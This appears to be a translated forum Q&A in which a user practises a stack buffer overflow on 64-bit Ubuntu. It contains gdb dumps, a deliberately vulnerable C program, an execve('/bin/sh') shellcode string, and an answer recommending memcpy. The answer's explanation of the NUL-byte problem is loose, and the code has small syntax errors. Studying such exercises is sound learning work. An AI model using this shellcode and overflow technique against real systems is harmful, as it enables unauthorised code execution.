利用64位Ubuntu

时间:2015-08-10 13:03:13

标签: c ubuntu assembly gdb

您好我在64位Ubuntu上练习利用,在检查源代码时,我意识到放在large_string中的缓冲区地址(0x7fffffffddd0)包含零。

(gdb) x/gx large_string
0x6010c0 <large_string>:    0x00007fffffffddd0
(gdb) x/bx large_string
0x6010c0 <large_string>:    0xd0
(gdb) x/bx large_string + 1
0x6010c1 <large_string+1>:  0xdd
(gdb) x/bx large_string + 2
0x6010c2 <large_string+2>:  0xff
(gdb) x/bx large_string + 3
0x6010c3 <large_string+3>:  0xff
(gdb) x/bx large_string + 4
0x6010c4 <large_string+4>:  0xff
(gdb) x/bx large_string + 5
0x6010c5 <large_string+5>:  0x7f
(gdb) x/bx large_string + 6
0x6010c6 <large_string+6>:  0x00
(gdb) x/bx large_string + 7
0x6010c7 <large_string+7>:  0x00

strcpy函数工作正常,并复制包含shellcode的large_string的前44个字节,但之后出现问题。

我的问题是编译器在调用strcpy期间是否将这些零解释为空字节?如果是,我该怎么做才能解决这个问题?

   #include <stdio.h>
   #include <string.h>

shellcode[] = "\xeb\x1e\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8b\x56\x0c\xcd\x80\xb0\x01\x31\xdb"
              "\xcd\x80\xe8\xdd\xff\xff\xff/bin/sh"

char large_string[200];
int main(int argc, char *argv[]){
    char buffer[96];
    int i;
    unsigned long *long_ptr;
    long_ptr = (unsigned long *) large_string;

    for(i = 0; i<25; i++)
        *(long_ptr + i) = (unsigned long) buffer;
    for(i = 0; i<strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    strcpy(buffer,large_string);
}

1 个答案:

答案 0 :(得分:0)

strcpy函数在遇到NUL字节时停止复制。由于shellcode包含NUL字节,因此您无法使用该功能进行复制。您应该使用memcpy,它将指定的字节数从一个缓冲区复制到另一个缓冲区:

memcpy(buffer,large_string,sizeof(large_string));